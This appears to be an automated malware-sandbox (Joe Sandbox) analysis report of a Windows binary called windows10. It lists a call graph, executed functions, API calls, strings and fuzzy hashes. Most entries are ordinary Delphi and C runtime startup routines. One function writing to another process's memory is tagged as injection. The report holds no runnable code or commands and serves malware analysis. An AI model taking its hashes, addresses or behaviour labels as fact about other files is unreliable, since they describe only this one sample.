73472->73473 73474 c7a8cc 73472->73474 73475 c7a902 73473->73475 73476 c7a95b 73473->73476 73477 c7a8e7 73474->73477 73513 c7a855 73474->73513 73523 c7d9ff 11 API calls _doexit 73474->73523 73527 c7b615 TlsGetValue TlsGetValue TlsGetValue TlsSetValue __mtterm 73475->73527 73476->73513 73532 c7b92f 14 API calls 2 library calls 73476->73532 73477->73513 73524 c7dcb0 11 API calls __mtterm 73477->73524 73479->73513 73514 c7b99d 13 API calls 5 library calls 73479->73514 73481 c7a907 73528 c7d6af 11 API calls __calloc_impl 73481->73528 73486 c7a8f1 73525 c7b649 12 API calls __mtterm 73486->73525 73487 c7a913 73487->73513 73529 c7b59a TlsGetValue TlsGetValue __initp_misc_cfltcvt_tab 73487->73529 73491 c7a861 __RTC_Initialize 73507 c7a865 73491->73507 73516 c7e031 11 API calls 2 library calls 73491->73516 73492 c7a8f6 73526 c7e1e4 HeapFree HeapFree 73492->73526 73493 c7a931 73496 c7a94f 73493->73496 73497 c7a938 73493->73497 73531 c7aa89 11 API calls 2 library calls 73496->73531 73530 c7b686 11 API calls 2 library calls 73497->73530 73498 c7a881 73517 c7da5c 11 API calls 3 library calls 73498->73517 73502 c7a88b 73503 c7a88f 73502->73503 73519 c7df76 19 API calls ___initmbctable 73502->73519 73518 c7b649 12 API calls __mtterm 73503->73518 73506 c7a89b 73508 c7a8af 73506->73508 73520 c7dcfe 19 API calls 6 library calls 73506->73520 73515 c7e1e4 HeapFree HeapFree 73507->73515 73508->73513 73522 c7dcb0 11 API calls __mtterm 73508->73522 73511 c7a8a4 73511->73508 73521 c7d838 13 API calls 5 library calls 73511->73521 73513->73467 73514->73491 73515->73513 73516->73498 73517->73502 73518->73507 73519->73506 73520->73511 73521->73508 73522->73503 73523->73477 73524->73486 73525->73492 73526->73513 73527->73481 73528->73487 73529->73493 73531->73513 73532->73513 73605 97dc44 73607 97dc4c 73605->73607 73606 97dc88 73607->73606 73609 97c184 73607->73609 73610 97c1a9 73609->73610 73611 97c193 73609->73611 73610->73606 73611->73610 73613 97c13c 73611->73613 73614 97c14c 73613->73614 73616 97c168 73613->73616 73617 97d3b4 73614->73617 73616->73610 73618 97d3f5 73617->73618 73621 97d290 73618->73621 73620 97d42e 73620->73616 73622 97d2b1 73621->73622 73623 97d32c 73622->73623 73627 97c97c 73622->73627 73623->73620 73625 97d348 73625->73623 73626 97c97c 6 API calls 73625->73626 73626->73623 73628 97c99f 73627->73628 73630 97c9a8 73628->73630 73631 97c860 6 API calls 73628->73631 73630->73625 73631->73630 73632 97ee44 73634 97ee4f 73632->73634 73636 979498 73634->73636 73637 9794a7 73636->73637 73640 9797dc 73637->73640 73641 97942c 73637->73641 73642 979474 73641->73642 73643 97943c 73641->73643 73643->73642 73645 c4b794 73643->73645 73646 c4b7ae 73645->73646 73647 c4b7c1 73645->73647 73649 b992fc 73646->73649 73647->73643 73650 b99322 GlobalAddAtomW 73649->73650 73652 b99370 73650->73652 73659 b99070 73652->73659 73654 b993d1 73664 c2cb1c 73654->73664 73656 b993f0 73670 c2e394 73656->73670 73658 b99410 73658->73647 73660 b9907f SetErrorMode 73659->73660 73661 b990d0 73659->73661 73662 b990b2 SetErrorMode 73660->73662 73663 b990a3 73660->73663 73661->73654 73662->73654 73663->73662 73665 c2cb26 73664->73665 73674 c2cffc 73665->73674 73667 c2cb5f 73678 c2d5d8 73667->73678 73669 c2cc47 73669->73656 73671 c2e3a3 73670->73671 73672 c2e4a7 LoadIconW 73671->73672 73673 c2e4ca 73672->73673 73673->73658 73675 c2d00e 73674->73675 73676 c2d032 LoadCursorW 73675->73676 73677 c2d04f 73675->73677 73676->73675 73677->73667 73679 c2d5f2 73678->73679 73680 c2d66c SystemParametersInfoW 73679->73680 73681 c2d68a 73680->73681 73681->73669 73682 c6b7b0 73683 c6b805 73682->73683 73684 c6b7db 73682->73684 73684->73683 73685 c6b7e2 WriteProcessMemory 73684->73685 73533 b9a110 73534 b9a230 73533->73534 73536 b9a13e 73533->73536 73536->73534 73537 b9a304 73536->73537 73538 b9a32c 73537->73538 73541 b9a26c 73538->73541 73540 b9a337 73540->73534 73544 b999a4 73541->73544 73543 b9a28f 73543->73540 73545 b999aa 73544->73545 73548 b95af0 73545->73548 73547 b999bf 73547->73543 73549 b95afa 73548->73549 73552 b8cae4 73549->73552 73551 b95b10 73551->73547 73553 b8caf5 73552->73553 73555 b8cb79 73553->73555 73556 c2d3ec 73553->73556 73555->73551 73559 c2d1a8 73556->73559 73558 c2d3f9 73558->73555 73560 c2d323 73559->73560 73561 c2d1d8 73559->73561 73560->73558 73561->73560 73562 c2d260 RegOpenKeyExW 73561->73562 73562->73561 73563 c2d273 73562->73563 73563->73558 73686 d478c9 73689 c30354 73686->73689 73687 d478f9 73690 c3036e 73689->73690 73693 c2544c 73690->73693 73691 c303cd 73691->73687 73694 c25460 73693->73694 73700 c24a24 73694->73700 73696 c25486 73697 c2558f 73696->73697 73704 a1e834 73696->73704 73697->73691 73698 c25517 73698->73691 73701 c24a2d 73700->73701 73702 b8cae4 RegOpenKeyExW 73701->73702 73703 c24a43 73702->73703 73703->73696 73705 a1e84a 73704->73705 73708 a1e7a8 73705->73708 73707 a1e89a 73707->73698 73709 a1e80c 73708->73709 73710 a1e7c9 73708->73710 73709->73707 73710->73709 73711 a1e7a8 KiUserCallbackDispatcher 73710->73711 73712 a1e7e1 73711->73712 73714 a1d0a0 73712->73714 73716 a1d0b1 73714->73716 73715 a1d11d 73715->73709 73716->73715 73719 a254a4 73716->73719 73720 a254c0 73719->73720 73723 a2ad64 73720->73723 73722 a1d0fc 73722->73709 73724 a2ad9d 73723->73724 73727 b894b0 73724->73727 73725 a2af5c 73725->73722 73728 b894ca KiUserCallbackDispatcher 73727->73728 73728->73725 73729 bdcee0 73730 bdcee9 73729->73730 73732 bdcef5 73729->73732 73733 bd8164 73730->73733 73735 bd816e 73733->73735 73734 bd81e4 73734->73732 73735->73734 73737 99af3c 73735->73737 73738 99af69 GetFileVersionInfoSizeW 73737->73738 73740 99affc 73738->73740 73741 99af89 GetFileVersionInfoW 73738->73741 73740->73734 73743 99afbc 73741->73743 73743->73734 73564 c79748 73566 c799fe 73564->73566 73567 c79a22 73566->73567 73571 c79a24 std::bad_alloc::bad_alloc 73566->73571 73574 c7c0b6 73566->73574 73590 c7c18f TlsGetValue TlsGetValue __mtterm 73566->73590 73569 c79a4a 73592 c799e1 11 API calls std::exception::exception 73569->73592 73571->73569 73591 c7c050 13 API calls __cinit 73571->73591 73573 c79a54 FindHandler 73575 c7c169 73574->73575 73576 c7c0c8 __mtinitlocknum 73574->73576 73599 c7c18f TlsGetValue TlsGetValue __mtterm 73575->73599 73583 c7c125 RtlAllocateHeap 73576->73583 73584 c7c161 73576->73584 73585 c7c155 73576->73585 73588 c7c15a 73576->73588 73593 c8029d 11 API calls 2 library calls 73576->73593 73594 c800f2 11 API calls 6 library calls 73576->73594 73595 c7c067 11 API calls 3 library calls 73576->73595 73596 c7c18f TlsGetValue TlsGetValue __mtterm 73576->73596 73578 c7c16f 73600 c7bd7e 11 API calls __XcptFilter 73578->73600 73583->73576 73584->73566 73597 c7bd7e 11 API calls __XcptFilter 73585->73597 73598 c7bd7e 11 API calls __XcptFilter 73588->73598 73590->73566 73591->73569 73592->73573 73593->73576 73594->73576 73595->73576 73596->73576 73597->73588 73598->73584 73599->73578 73600->73584

                                                                        Executed Functions

                                                                        Function 0097DCF8 Relevance: .0, Instructions: 6COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4177483806.0000000000971000.00000020.00000001.01000000.00000007.sdmp, Offset: 00971000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_971000_windows10.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ab534339ebf2f26df59a6dabcf4891875b70cb508f85659e8086122488c55be5
                                                                        • Instruction ID: 051481fce150fa8a1a80cea67762505c7b3fa195550938b0d6a995828549e412
                                                                        • Opcode Fuzzy Hash: ab534339ebf2f26df59a6dabcf4891875b70cb508f85659e8086122488c55be5
                                                                        • Instruction Fuzzy Hash: F7A012104088000BC444A7184C4350F35806D81210FC40214B45CA5282E606856803D7
                                                                        Function 00B992FC Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 112COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GlobalAddAtomW.KERNEL32(00000000), ref: 00B99350
                                                                          • Part of subcall function 00B99070: SetErrorMode.KERNELBASE(00008000), ref: 00B99084
                                                                          • Part of subcall function 00B99070: SetErrorMode.KERNELBASE(?,00B990D0), ref: 00B990C3
                                                                          • Part of subcall function 00C2E394: LoadIconW.USER32(00C54040,MAINICON,?,?,?,00B99410), ref: 00C2E4BC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4177483806.0000000000B4D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B4D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_b4d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$AtomGlobalIconLoad
                                                                        • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$DelphiRM_GetObjectInstance$USER32
                                                                        • API String ID: 1953398334-1139167764
                                                                        • Opcode ID: 7089b5749a4869b0ceda104c47f737667e29058e792788f16f9e07e3319035ab
                                                                        • Instruction ID: a5ec34f5ec896568a69868311cd8afcabe63df685fced1378d8c57f60d2c8dea
                                                                        • Opcode Fuzzy Hash: 7089b5749a4869b0ceda104c47f737667e29058e792788f16f9e07e3319035ab
                                                                        • Instruction Fuzzy Hash: EC415C796003459FCB51EFB8EC82B9D77E4EB58300B4084B9F414E7372EA34A945CB61
                                                                        Function 00C7A83B Relevance: 9.1, APIs: 6, Instructions: 105COMMONLIBRARYCODE
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • __RTC_Initialize.LIBCMT ref: 00C7A86C
                                                                        • __mtterm.LIBCMT ref: 00C7A88F
                                                                          • Part of subcall function 00C7B649: TlsFree.KERNEL32(00C8C65C,00C7A8F6), ref: 00C7B674
                                                                        • __setenvp.LIBCMT ref: 00C7A89F
                                                                        • __cinit.LIBCMT ref: 00C7A8AA
                                                                        • __mtterm.LIBCMT ref: 00C7A8F1
                                                                        • __freeptd.LIBCMT ref: 00C7A961
                                                                          • Part of subcall function 00C7B615: TlsGetValue.KERNEL32(?,00C7B784), ref: 00C7B61E
                                                                          • Part of subcall function 00C7B615: TlsSetValue.KERNEL32(00000000), ref: 00C7B63F
                                                                          • Part of subcall function 00C7D6AF: __calloc_impl.LIBCMT ref: 00C7D6C0
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4454342711.0000000000C79000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C79000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_c79000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: Value__mtterm$FreeInitialize__calloc_impl__cinit__freeptd__setenvp
                                                                        • String ID:
                                                                        • API String ID: 2350678278-0
                                                                        • Opcode ID: 740a37182b5d6dbb907ca612125e5b94fed63eab136fdeaf0953b735bfb92d47
                                                                        • Instruction ID: 9e7686e36703a4f94311e4f6a19ec13855871cd9ca3f48d0be9e649b06c2dac7
                                                                        • Opcode Fuzzy Hash: 740a37182b5d6dbb907ca612125e5b94fed63eab136fdeaf0953b735bfb92d47
                                                                        • Instruction Fuzzy Hash: A721B532504642999B297BB65C0372E37A89FD4764F20C53AFA2DD10E2FF20C943B667
                                                                        Function 00C79748 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 106 c79748-c79a06 108 c79a15-c79a18 call c7c0b6 106->108 110 c79a1d-c79a20 108->110 111 c79a22-c79a23 110->111 112 c79a08-c79a13 call c7c18f 110->112 112->108 115 c79a24-c79a30 112->115 116 c79a32-c79a4a call c79994 call c7c050 115->116 117 c79a4b-c79a6f call c799e1 call c7c1b7 115->117 116->117 126 c79a78-c79a7e 117->126 127 c79a71-c79a74 126->127 128 c79a80-c79a83 126->128 129 c79a87-c79a88 127->129 130 c79a76-c79a77 127->130 128->129 131 c79a85 128->131 130->126 131->129
                                                                        APIs
                                                                        • _malloc.LIBCMT ref: 00C79A18
                                                                          • Part of subcall function 00C7C0B6: __FF_MSGBANNER.LIBCMT ref: 00C7C0D9
                                                                          • Part of subcall function 00C7C0B6: __NMSG_WRITE.LIBCMT ref: 00C7C0E0
                                                                          • Part of subcall function 00C7C0B6: RtlAllocateHeap.NTDLL(00000000,?,00000001), ref: 00C7C12D
                                                                        • std::bad_alloc::bad_alloc.LIBCMT ref: 00C79A3B
                                                                          • Part of subcall function 00C79994: std::exception::exception.LIBCMT ref: 00C799A0
                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 00C79A4F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4454342711.0000000000C79000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C79000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_c79000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                        • String ID: PU'
                                                                        • API String ID: 832318072-4254717615
                                                                        • Opcode ID: 5db91140ad9be5fa89ba76169fa805d30b553dbff35875293046e9e3ab277b66
                                                                        • Instruction ID: dcb477dc11fed9ab8304cdc5fe4bf2686f6bca1dc7ea90decc32f69c0f3935fe
                                                                        • Opcode Fuzzy Hash: 5db91140ad9be5fa89ba76169fa805d30b553dbff35875293046e9e3ab277b66
                                                                        • Instruction Fuzzy Hash: 00014C3140430A6A8F24BB66D842ABD37E8DB90378B14C039F81D87192EB71DE42E795
                                                                        Function 00C2D1A8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125registryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 132 c2d1a8-c2d1d2 133 c2d334-c2d352 132->133 134 c2d1d8-c2d206 132->134 139 c2d323-c2d32d 134->139 140 c2d20c-c2d216 134->140 139->133 141 c2d219-c2d225 call b99244 140->141 144 c2d316-c2d31d 141->144 145 c2d22b-c2d26d RegOpenKeyExW 141->145 144->139 144->141 145->144 147 c2d273-c2d2a7 145->147 149 c2d2f8-c2d30e 147->149 150 c2d2a9-c2d2e0 147->150 150->149 154 c2d2e2-c2d2ee 150->154 154->149
                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE(80000002,00000000), ref: 00C2D266
                                                                        Strings
                                                                        • layout text, xrefs: 00C2D297
                                                                        • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 00C2D250
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4177483806.0000000000B4D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B4D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_b4d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: Open
                                                                        • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                                                        • API String ID: 71445658-2652665750
                                                                        • Opcode ID: c97f27ef7d8aa72474348f5b5c105c4ece938b484780acdacf72108639888d8d
                                                                        • Instruction ID: b40c1d47739de81aab5c3947b177a1c422462d404957ca338276b57dc2bf1ea1
                                                                        • Opcode Fuzzy Hash: c97f27ef7d8aa72474348f5b5c105c4ece938b484780acdacf72108639888d8d
                                                                        • Instruction Fuzzy Hash: 88414574A00218AFDB11DF98D982BAEB7F9EB49700F5040A4E905E7751E730EF00CB62
                                                                        Function 00B99070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 155 b99070-b9907d 156 b9907f-b990a1 SetErrorMode 155->156 157 b990d0-b990d2 155->157 158 b990a3-b990ad 156->158 159 b990b2-b990c8 SetErrorMode 156->159 158->159
                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00008000), ref: 00B99084
                                                                        • SetErrorMode.KERNELBASE(?,00B990D0), ref: 00B990C3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4177483806.0000000000B4D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B4D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_b4d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID: imm32.dll
                                                                        • API String ID: 2340568224-1815517138
                                                                        • Opcode ID: 7b31b3ca2d3d56708ec54e4721e49acf33907f1f202250a25360c77bb4a61243
                                                                        • Instruction ID: ab5bbfb35947d8730d45f7678543ebcec5dc83cf8237dfd5978dc2764dd5638c
                                                                        • Opcode Fuzzy Hash: 7b31b3ca2d3d56708ec54e4721e49acf33907f1f202250a25360c77bb4a61243
                                                                        • Instruction Fuzzy Hash: E0F02775508304AFDB51EB68EC02B2977E8D345B11F91C0F9F41C93AA0D6759950DB30
                                                                        Function 00C2E394 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 150windowCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 236 c2e394-c2e3a1 237 c2e3a3 236->237 238 c2e3ab-c2e3c1 236->238 237->238 240 c2e3c3-c2e3d2 238->240 241 c2e3d8-c2e3e2 238->241 240->241 242 c2e3f2-c2e3fc 241->242 243 c2e3e4-c2e3ec 241->243 244 c2e3fe-c2e406 242->244 245 c2e40c-c2e516 call b6a890 call b73ea0 LoadIconW call b74338 242->245 243->242 244->245 258 c2e526-c2e537 245->258 259 c2e518-c2e51b 245->259 261 c2e539 258->261 262 c2e53e-c2e56c call c23c28 258->262 259->258 261->262 267 c2e571-c2e586 262->267 268 c2e588-c2e58a call c2e7d8 267->268 269 c2e58f-c2e5db call c31304 call c31f70 267->269 268->269 275 c2e5ec-c2e5f3 269->275 276 c2e5dd-c2e5e9 269->276 276->275
                                                                        APIs
                                                                        • LoadIconW.USER32(00C54040,MAINICON,?,?,?,00B99410), ref: 00C2E4BC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4177483806.0000000000B4D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B4D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_b4d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: IconLoad
                                                                        • String ID: MAINICON
                                                                        • API String ID: 2457776203-2283262055
                                                                        • Opcode ID: 6d64830c4a3b51380fc8a04a86404d9d5a8f46b1955a185def850359e565561c
                                                                        • Instruction ID: 11a829a27d5e459eac02b001c1153afa85d98e5f17fd346a1d7410dc46ec200d
                                                                        • Opcode Fuzzy Hash: 6d64830c4a3b51380fc8a04a86404d9d5a8f46b1955a185def850359e565561c
                                                                        • Instruction Fuzzy Hash: 62611B705043948FDB51EF68D886B897BE5AB05304F0880B9EC48DF357DBB59A88CB61
                                                                        Function 0099AF3C Relevance: 3.1, APIs: 2, Instructions: 77COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 278 99af3c-99af87 GetFileVersionInfoSizeW 282 99af89-99afba GetFileVersionInfoW 278->282 283 99affc-99b011 278->283 287 99afbc-99afd4 282->287 288 99afdf-99aff4 282->288 287->288 291 99afd6-99afdc 287->291 291->288
                                                                        APIs
                                                                        • GetFileVersionInfoSizeW.KERNELBASE(00000000), ref: 0099AF7E
                                                                        • GetFileVersionInfoW.KERNELBASE(00000000), ref: 0099AFB3
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4177483806.000000000098B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0098B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_98b000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: FileInfoVersion$Size
                                                                        • String ID:
                                                                        • API String ID: 2104008232-0
                                                                        • Opcode ID: f6b6862bc8111e6bbef38a72355977c2207b142c41cd2dc56a504daf2a15095f
                                                                        • Instruction ID: 98e20a9044858d4e51e1455a471d23927e90326588bb4a6914d8113eebe33e57
                                                                        • Opcode Fuzzy Hash: f6b6862bc8111e6bbef38a72355977c2207b142c41cd2dc56a504daf2a15095f
                                                                        • Instruction Fuzzy Hash: 54214F72A00609AFDF11EFA8CD92DAEB7FCEB89700B518475B514E3651EB349E00DA61
                                                                        Function 00C27B98 Relevance: 1.7, APIs: 1, Instructions: 182COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 292 c27b98-c27bba 293 c27c2c-c27c34 292->293 294 c27bbc-c27bc9 call c2cee4 292->294 296 c27c36-c27c38 call c196d4 293->296 297 c27c3d-c27c41 293->297 294->293 302 c27bcb-c27bcf 294->302 296->297 300 c27c43-c27c45 297->300 301 c27c4d 297->301 303 c27c47-c27c4b 300->303 304 c27c4f-c27c57 300->304 301->304 305 c27bd1-c27be3 call c2ced0 302->305 303->301 303->304 306 c27c62-c27c64 304->306 307 c27c59-c27c5b 304->307 315 c27c26-c27c2a 305->315 316 c27be5-c27bf3 call c2ced0 305->316 309 c27d31-c27d3a call b92cf8 306->309 310 c27c6a-c27c6e 306->310 307->306 322 c27d4b-c27d52 309->322 323 c27d3c-c27d46 call b92928 KiUserCallbackDispatcher 309->323 313 c27c70-c27c77 310->313 314 c27c7d-c27c87 310->314 313->309 313->314 318 c27c92-c27c96 314->318 319 c27c89-c27c90 314->319 315->293 315->305 316->315 333 c27bf5-c27c21 316->333 320 c27c98-c27ca1 call b92cf8 318->320 321 c27d0c-c27d13 318->321 319->318 319->320 320->322 337 c27ca7-c27cc3 call b92928 320->337 321->322 330 c27d15-c27d1e call b92cf8 321->330 328 c27d54-c27d58 call c295c0 322->328 329 c27d5d-c27d6b call c27ad0 322->329 323->322 328->329 340 c27db2-c27dc7 329->340 341 c27d6d-c27d71 329->341 330->322 343 c27d20-c27d2f call b92928 330->343 333->315 358 c27cc5-c27ccc call bdd2a4 337->358 359 c27cfa-c27d0a call b92928 call c196d4 337->359 341->340 344 c27d73-c27d77 341->344 343->322 344->340 348 c27d79-c27dad call b92928 call b8ab94 * 2 344->348 348->340 368 c27ce1-c27cf4 call b92928 358->368 369 c27cce-c27cd6 358->369 359->322 368->359 369->368 371 c27cd8-c27cdf 369->371 371->359 371->368
                                                                        APIs
                                                                        • KiUserCallbackDispatcher.NTDLL(00000000,00000000,00000000,00C27DC8), ref: 00C27D46
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4177483806.0000000000B4D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B4D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_b4d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: CallbackDispatcherUser
                                                                        • String ID:
                                                                        • API String ID: 2492992576-0
                                                                        • Opcode ID: 3a55169b5a2e209b12851487324187aef34270f8efea316ecd8d126837c331c3
                                                                        • Instruction ID: 799ed56bb1caf5dd1a6dd67216b80e5d1792a804041c1f0e98de78c8e7512869
                                                                        • Opcode Fuzzy Hash: 3a55169b5a2e209b12851487324187aef34270f8efea316ecd8d126837c331c3
                                                                        • Instruction Fuzzy Hash: 1951B3306083605BDB25AB38ECC57AE37D4AF45700F0896B5FC559BA97DA74CE448750
                                                                        Function 00C4A114 Relevance: 1.7, APIs: 1, Instructions: 159COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 375 c4a114-c4a121 376 c4a127-c4a1a6 375->376 377 c4a3be-c4a3c4 375->377 382 c4a1b2-c4a1d1 376->382 383 c4a1a8-c4a1ad GetNativeSystemInfo 376->383 384 c4a1e5-c4a232 382->384 385 c4a1d3-c4a1da 382->385 383->382 386 c4a237-c4a24e 384->386 385->386 387 c4a1dc-c4a1e3 385->387 390 c4a254-c4a255 386->390 391 c4a33d-c4a345 386->391 387->384 387->386 390->377 392 c4a25b-c4a263 390->392 393 c4a347 391->393 394 c4a34e-c4a35d 391->394 395 c4a265 392->395 396 c4a276-c4a27e 392->396 397 c4a35f-c4a36e 393->397 398 c4a349-c4a34a 393->398 394->377 399 c4a267-c4a268 395->399 400 c4a2a8-c4a2b0 395->400 401 c4a294-c4a2a3 396->401 402 c4a280-c4a28f 396->402 397->377 403 c4a370-c4a378 398->403 404 c4a34c 398->404 406 c4a2da-c4a2e2 399->406 407 c4a26a-c4a26b 399->407 409 c4a2c6-c4a2d5 400->409 410 c4a2b2-c4a2c1 400->410 401->377 402->377 411 c4a393-c4a39c 403->411 412 c4a37a-c4a380 403->412 404->377 413 c4a2e4-c4a2f3 406->413 414 c4a2f8-c4a307 406->414 415 c4a271 407->415 416 c4a30c-c4a313 407->416 409->377 410->377 424 c4a39e-c4a3ad 411->424 425 c4a3af-c4a3b4 411->425 412->411 419 c4a382-c4a391 412->419 413->377 414->377 415->377 429 c4a315-c4a324 416->429 430 c4a329-c4a338 416->430 419->377 424->377 425->377 429->377 430->377
                                                                        APIs
                                                                        • GetNativeSystemInfo.KERNELBASE(?), ref: 00C4A1AD
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4177483806.0000000000C4A000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C4A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_c4a000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: InfoNativeSystem
                                                                        • String ID:
                                                                        • API String ID: 1721193555-0
                                                                        • Opcode ID: a5a29aea8d9572a7f27ed8afb4546fd9580458094ca71e436b27364b3cee5199
                                                                        • Instruction ID: 7cebaa0531d8d0f83ad5bdfcb22eaa880d5ae51ccfee939ce63de4681adbfe99
                                                                        • Opcode Fuzzy Hash: a5a29aea8d9572a7f27ed8afb4546fd9580458094ca71e436b27364b3cee5199
                                                                        • Instruction Fuzzy Hash: 4561C4782483448BDB24DF28D90176E7BF1BB94305FA08D2AE4959B275E671CA89CB03
                                                                        Function 00C2D5D8 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 434 c2d5d8-c2d5f0 435 c2d5f2-c2d5fe 434->435 436 c2d601-c2d616 434->436 435->436 437 c2d624-c2d639 436->437 438 c2d618-c2d61f call c30d6c 436->438 441 c2d653-c2d662 call b6acf0 437->441 442 c2d63b-c2d651 call b6acf0 437->442 438->437 448 c2d667-c2d688 SystemParametersInfoW 441->448 442->448 450 c2d6f0-c2d737 call b6ae28 call b6acf0 * 3 448->450 451 c2d68a-c2d6ee call b6acf0 * 4 448->451 471 c2d73c-c2d780 call b6aa7c * 3 450->471 451->471 481 c2d782-c2d78b call c30d6c 471->481 482 c2d790 471->482 481->482
                                                                        APIs
                                                                        • SystemParametersInfoW.USER32(00000029,00000000,?,00000000,?,00000000,00C1F730,?,00C2CC47,00000000,00000000,00C2783C,6E6F4646,?,?,00000000), ref: 00C2D681
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4177483806.0000000000B4D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B4D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_b4d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: InfoParametersSystem
                                                                        • String ID:
                                                                        • API String ID: 3098949447-0
                                                                        • Opcode ID: 2869844d3993d529d54f2b1abd51753683ffe54495902b23fb49df1822e49473
                                                                        • Instruction ID: a6f875939bc48000440a29f8f4633d97e6fe21f427f2f5a19a65052441e0a94e
                                                                        • Opcode Fuzzy Hash: 2869844d3993d529d54f2b1abd51753683ffe54495902b23fb49df1822e49473
                                                                        • Instruction Fuzzy Hash: 9D4145346002149BDB50FB78DC86B9A33E9EF45B00F5480B1B90CEB757EE38AD858B65
                                                                        Function 00C6B7B0 Relevance: 1.5, APIs: 1, Instructions: 44injectionCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 484 c6b7b0-c6b7d9 485 c6b805-c6b80b 484->485 486 c6b7db 484->486 487 c6b7e2-c6b804 WriteProcessMemory 486->487 488 c6b7dd-c6b7e0 486->488 488->485 488->487
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,000000FF,?,?,00000005,00000000), ref: 00C6B7F5
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4454342711.0000000000C6B000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C6B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_c6b000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
